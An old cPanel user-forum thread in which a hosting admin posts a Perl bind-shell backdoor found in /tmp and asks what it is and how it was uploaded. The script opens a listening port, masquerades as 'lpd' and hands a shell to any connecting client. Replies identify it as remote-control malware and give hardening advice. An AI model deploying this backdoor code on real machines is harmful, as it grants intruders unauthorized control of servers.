The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Possible hack?

Discussion in 'General Discussion' started by numberonehost, Feb 19, 2004.

  1. numberonehost

    numberonehost Active Member

    Joined:
    Apr 29, 2003
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Norway
    Found .bs.pl in /tmp with these contents:
    ----------------------------------------------
    #!/usr/bin/perl

    # * Author:
    # headflux (hf@synnergy.net)
    # Synnergy Networks (c) 1999, http://www.synnergy.net
    # *** Synnergy Networks

    use Socket;

    #rintf "BS\n";
    #lush();

    $port= 60021;
    $proto= getprotobyname('tcp');
    $cmd= "lpd";
    $system= 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';

    $0 = $cmd;


    socket(SERVER, PF_INET, SOCK_STREAM, $proto)
    or die "socket:$!";

    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
    or die "setsockopt: $!";

    bind(SERVER, sockaddr_in($port, INADDR_ANY))
    or die "bind: $!";

    listen(SERVER, SOMAXCONN)or die "listen: $!";

    for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
    {
    open(STDIN, ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");

    system($system);

    close(STDIN);
    close(STDOUT);
    close(STDERR);
    }

    ----------------------------------------------

    Is this used to hack the server?

    I noticed mysql going "wild" on the server moments before I noticed this script. The load went above 100.

    wget is diabled on my server so I was wondering how anyone can place this script in /tmp? It was owned by nobody.

    I would like to try the script in this thread: http://forums.cpanel.net/showthread.php?s=&threadid=11082
    in order to find the domain it was uploaded by. I tried the script but found no result as wget is already disabled on my server.

    If not wget was used to put it there what else might be used?

    Eivind
     
  2. nybble

    nybble Well-Known Member

    Joined:
    Jan 26, 2004
    Messages:
    223
    Likes Received:
    0
    Trophy Points:
    16
    Read what the script is doing and you will know if it is a hack, it lists all the commands

    And wget is not the only way to put things in /tmp
     
  3. numberonehost

    numberonehost Active Member

    Joined:
    Apr 29, 2003
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Norway
    I'm asking because I only understand some of it but not enough to determine how serious the script is. It seems as the script opens a tcp socket at port 60021. It determines which user it is run as and at which machine and directory.

    Could you tell me more about what the script does?

    I know. That's why I'm asking. Could you meantion one or two?

    Eivind
     
  4. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    lynx, curl, scp, ftp
     
  5. numberonehost

    numberonehost Active Member

    Joined:
    Apr 29, 2003
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Norway
    Thanks jamesbond!

    Unfortunately I was unable to determine how this file got in /tmp using the script at http://forums.cpanel.net/showthread.php?s=&threadid=11082 with various tries (wget, scp, ftp, lynx, curl, bs.pl).

    Is there another way to find out where this file came from?

    Eivind
     
  6. nybble

    nybble Well-Known Member

    Joined:
    Jan 26, 2004
    Messages:
    223
    Likes Received:
    0
    Trophy Points:
    16
    Perhaps you should ask the server admin? :D
     
  7. Etheral

    Etheral Well-Known Member

    Joined:
    Dec 8, 2003
    Messages:
    208
    Likes Received:
    0
    Trophy Points:
    16
    that reallly gives it away.....
     
  8. nybble

    nybble Well-Known Member

    Joined:
    Jan 26, 2004
    Messages:
    223
    Likes Received:
    0
    Trophy Points:
    16
    From what I can see its a script to let someone else control your server, heh
     
  9. Etheral

    Etheral Well-Known Member

    Joined:
    Dec 8, 2003
    Messages:
    208
    Likes Received:
    0
    Trophy Points:
    16
    lol basicly
     
  10. numberonehost

    numberonehost Active Member

    Joined:
    Apr 29, 2003
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Norway
    Thanks for your inputs guys!

    It seems as if it's impossible to find the source of this file since I'm not running with php_suexec. If the file contents was download from a file with name of file.txt by php and php created the .bs.pl file in /tmp, then I have no means of finding out where the file came from or which account created this file?

    I have /tmp nosuid and noexec. I thought that it would not be possible to run a script in /tmp because of this. Am I mistaken? If I am, how can I prevent such a script from running in /tmp?

    I really hope anyone have an answer to this.
     
  11. nybble

    nybble Well-Known Member

    Joined:
    Jan 26, 2004
    Messages:
    223
    Likes Received:
    0
    Trophy Points:
    16
    chown /tmp to "nobody"
    Run suseexc, enable open_basedir protection and get a server admin.
     
  12. numberonehost

    numberonehost Active Member

    Joined:
    Apr 29, 2003
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Norway
    What would chowning of /tmp to nobody accomplish (pros/cons)?

    The others I've already done. I've done all the security tweaking that's normal (and not) in these forums and other forums (snort, logwatch, chkrootkit, ssh modifications, mod_security etc.).
     
  13. Ben

    Ben Well-Known Member

    Joined:
    Aug 19, 2002
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    6
    mount /tmp noexec

    More than anything else, the number one thing that will help you is to mount /tmp noexec, that, and run iptables or a similar firewall that will only allow incoming connections to certain ports and block all others.
     
Loading...

Share This Page